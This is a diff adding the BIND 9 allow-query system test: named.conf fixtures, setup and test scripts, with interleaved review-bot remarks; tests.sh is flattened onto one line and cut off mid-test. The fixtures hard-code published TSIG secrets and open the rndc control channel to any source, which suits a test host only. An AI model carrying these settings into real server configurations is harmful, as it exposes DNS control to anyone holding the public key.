+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl accept { 10.53.0.2; };
+
+acl badaccept { 10.53.0.1; };
+
+key one {
+ algorithm hmac-md5;
+ secret "1234abcd8765";
+};
+
+key two {
+ algorithm hmac-md5;
+ secret "1234efgh8765";
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+};
+
+zone "any.example" {
+ type primary;
+ file "generic.db";
+ allow-query { any; };
+};
+
+zone "none.example" {
+ type primary;
+ file "generic.db";
+ allow-query { none; };
+};
+
+zone "addrallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { 10.53.0.2; };
+};
+
+zone "addrnotallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { 10.53.0.1; };
+};
+
+zone "addrdisallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { ! 10.53.0.2; };
+};
+
+zone "aclallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { accept; };
+};
+
+zone "aclnotallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { badaccept; };
+};
+
+zone "acldisallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { ! accept; };
+};
+
+/* Also usable for testing key not allowed */
+zone "keyallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { key one; };
+};
+
+zone "keydisallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query { ! key one; };
+};
diff --git a/bin/tests/system/allow-query/ns2/named53.conf.in b/bin/tests/system/allow-query/ns2/named53.conf.in
new file mode 100644
index 0000000..41ac6d3
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named53.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { none; };
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+ allow-query { any; };
+};
diff --git a/bin/tests/system/allow-query/ns2/named54.conf.in b/bin/tests/system/allow-query/ns2/named54.conf.in
new file mode 100644
index 0000000..64a3f69
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named54.conf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ allow-query { any; };
+};
+
+include "controls.conf";
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "generic.db";
+ allow-query { none; };
+};
diff --git a/bin/tests/system/allow-query/ns2/named55.conf.in b/bin/tests/system/allow-query/ns2/named55.conf.in
new file mode 100644
index 0000000..642e4c9
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named55.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { none; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ allow-query { any; };
+ };
+
+};
diff --git a/bin/tests/system/allow-query/ns2/named56.conf.in b/bin/tests/system/allow-query/ns2/named56.conf.in
new file mode 100644
index 0000000..187d697
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named56.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+
+ allow-query { any; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ allow-query { none; };
+ };
+};
diff --git a/bin/tests/system/allow-query/ns2/named57.conf.in b/bin/tests/system/allow-query/ns2/named57.conf.in
new file mode 100644
index 0000000..1502b12
--- /dev/null
+++ b/bin/tests/system/allow-query/ns2/named57.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+include "controls.conf";
+
+view "internal" {
+ allow-query-on { any; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "normal.example" {
+ type primary;
+ file "generic.db";
+ };
+
+ zone "aclnotallow.example" {
+ type primary;
+ file "generic.db";
+ allow-query-on { none; };
+ };
+};
diff --git a/bin/tests/system/allow-query/ns3/named.args b/bin/tests/system/allow-query/ns3/named.args
new file mode 100644
index 0000000..35e99d8
--- /dev/null
+++ b/bin/tests/system/allow-query/ns3/named.args
@@ -0,0 +1,2 @@
+# this server only has 127.0.0.1 in its localhost/localnets ACLs
+-m record,size,mctx -c named.conf -d 99 -D allow-query-ns3 -X named.lock -g -T maxcachesize=2097152 -T fixedlocal
diff --git a/bin/tests/system/allow-query/ns3/named1.conf.in b/bin/tests/system/allow-query/ns3/named1.conf.in
new file mode 100644
index 0000000..68af61f
--- /dev/null
+++ b/bin/tests/system/allow-query/ns3/named1.conf.in
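Review bot: ns2/named57.conf.in carries no comment saying which case it covers, and its zone `aclnotallow.example` is restricted by `allow-query-on { none; };` rather than by an ACL, so the zone name suggests a different test. Presumably the intent is that the zone-level `allow-query-on` takes precedence over the view-level `{ any; }`. A comment above the zone, such as `/* zone-level allow-query-on { none; } must win over the view's { any; } */`, would make the expected access decision explicit for whoever maintains these ACL precedence cases.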
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/allow-query/ns3/named2.conf.in b/bin/tests/system/allow-query/ns3/named2.conf.in
new file mode 100644
index 0000000..d3f2205
--- /dev/null
+++ b/bin/tests/system/allow-query/ns3/named2.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ allow-recursion { any; };
+ allow-recursion-on { none; };
+ allow-query-cache-on { 10.53.0.3; };
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
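Review bot: The `controls` block in ns3/named1.conf.in accepts rndc connections with `allow { any; }` and authenticates them with a fixed `rndc_key` secret that is published in the repository; named2.conf.in, named3.conf.in and named4.conf.in repeat the same block. That is acceptable only because 10.53.0.3 is presumably an address that exists solely on the test host, which the file does not say. A comment above the block would keep the fixture from being copied into a real configuration: `/* Test fixture only: fixed rndc key, control channel open to any source. */`.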
diff --git a/bin/tests/system/allow-query/ns3/named3.conf.in b/bin/tests/system/allow-query/ns3/named3.conf.in
new file mode 100644
index 0000000..32e1e0d
--- /dev/null
+++ b/bin/tests/system/allow-query/ns3/named3.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; 10.53.1.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ allow-recursion { any; };
+ allow-query-cache { any; };
+ allow-query-cache-on { 10.53.0.3; }; # allow-recursion-on inherits
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/allow-query/ns3/named4.conf.in b/bin/tests/system/allow-query/ns3/named4.conf.in
new file mode 100644
index 0000000..e8ab737
--- /dev/null
+++ b/bin/tests/system/allow-query/ns3/named4.conf.in
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; 10.53.1.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ allow-recursion { any; };
+ allow-query-cache { any; };
+ allow-recursion-on { 10.53.0.3; }; # allow-query-cache-on inherits
+ dnssec-validation no;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
diff --git a/bin/tests/system/allow-query/setup.sh b/bin/tests/system/allow-query/setup.sh
new file mode 100644
index 0000000..3a693b5
--- /dev/null
+++ b/bin/tests/system/allow-query/setup.sh
@@ -0,0 +1,20 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ../common/controls.conf.in ns2/controls.conf
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named01.conf.in ns2/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
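Review bot: The `-e` in setup.sh's `#!/bin/sh -e` only takes effect when the script is executed directly; if the harness runs it as `sh setup.sh` (how it is invoked is not visible here), the option is ignored. A failing `copy_setports` would then leave a stale or missing named.conf, and the access-control tests would run against the wrong configuration. Put the option in the body instead, as `set -e` on the line before `SYSTEMTESTTOP=..`. Quoting the sourced path as `. "$SYSTEMTESTTOP/conf.sh"` would also be safer.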
diff --git a/bin/tests/system/allow-query/tests.sh b/bin/tests/system/allow-query/tests.sh
new file mode 100644
index 0000000..41c7bb7
--- /dev/null
+++ b/bin/tests/system/allow-query/tests.sh
@@ -0,0 +1,688 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Test of allow-query statement. +# allow-query takes an address match list and can be included in either the +# options statement or in the zone statement. This test assumes that the +# acl tests cover the details of the address match list and uses a limited +# number of address match test cases to ensure that allow-query finds the +# expected match. +# Test list: +# In options: +# default (any), any, none, [localhost, localnets], +# allowed address, not allowed address, denied address, +# allowed key, not allowed key, denied key +# allowed acl, not allowed acl, denied acl (acls pointing to addresses) +# +# Each of these tests requires changing to a new configuration +# file and using rndc to update the server +# +# In view, with nothing in options (default to any) +# default (any), any, none, [localhost, localnets], +# allowed address, not allowed address, denied address, +# allowed key, not allowed key, denied key +# allowed acl, not allowed acl, denied acl (acls pointing to addresses) +# +# In view, with options set to none, view set to any +# In view, with options set to any, view set to none +# +# In zone, with nothing in options (default to any) +# any, none, [localhost, localnets], +# allowed address, denied address, +# allowed key, not allowed key, denied key +# allowed acl, not allowed acl, denied acl (acls pointing to addresses), +# +# In zone, with options set to none, zone set to any +# In zone, with options set to any, zone set to none +# In zone, with view set to none, zone set to any +# In zone, with 
view set to any, zone set to none +# +# zone types of primary, secondary and stub can be tested in parallel by +# using multiple instances (ns2 as primary, ns3 as secondary, ns4 as stub) +# and querying as necessary. +# + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +nocmd +norec +noques +noauth +noadd +nostats +dnssec -p ${PORT}" + +status=0 +n=0 + +nextpart ns2/named.run > /dev/null + +# Test 1 - default, query allowed +n=`expr $n + 1` +echo_i "test $n: default - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 2 - explicit any, query allowed +n=`expr $n + 1` +copy_setports ns2/named02.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: explicit any - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 3 - none, query refused +n=`expr $n + 1` +copy_setports ns2/named03.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: none - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 4 - address allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named04.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: address allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > 
dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 5 - address not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named05.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: address not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 6 - address disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named06.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: address disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 7 - acl allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named07.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: acl allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 8 - acl not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named08.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: acl not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || 
ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + + +# Test 9 - acl disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named09.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: acl disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 10 - key allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named10.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: key allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 11 - key not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named11.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: key not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y two:1234efgh8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 12 - key disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named12.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: key disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep 
'^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# The next set of tests check if allow-query works in a view + +n=20 +# Test 21 - views default, query allowed +n=`expr $n + 1` +copy_setports ns2/named21.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views default - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 22 - views explicit any, query allowed +n=`expr $n + 1` +copy_setports ns2/named22.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views explicit any - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 23 - views none, query refused +n=`expr $n + 1` +copy_setports ns2/named23.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views none - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 24 - views address allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named24.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views address allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep 
'^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 25 - views address not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named25.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views address not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 26 - views address disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named26.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views address disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 27 - views acl allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named27.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views acl allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 28 - views acl not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named28.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views acl not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' 
dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 29 - views acl disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named29.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views acl disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 30 - views key allowed, query allowed +n=`expr $n + 1` +copy_setports ns2/named30.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views key allowed - query allowed" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 31 - views key not allowed, query refused +n=`expr $n + 1` +copy_setports ns2/named31.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views key not allowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y two:1234efgh8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# Test 32 - views key disallowed, query refused +n=`expr $n + 1` +copy_setports ns2/named32.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 + +echo_i "test $n: views key disallowed - query refused" +ret=0 +$DIG $DIGOPTS @10.53.0.2 -b 10.53.0.2 -y one:1234abcd8765 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: REFUSED' dig.out.ns2.$n > /dev/null || ret=1 +grep 
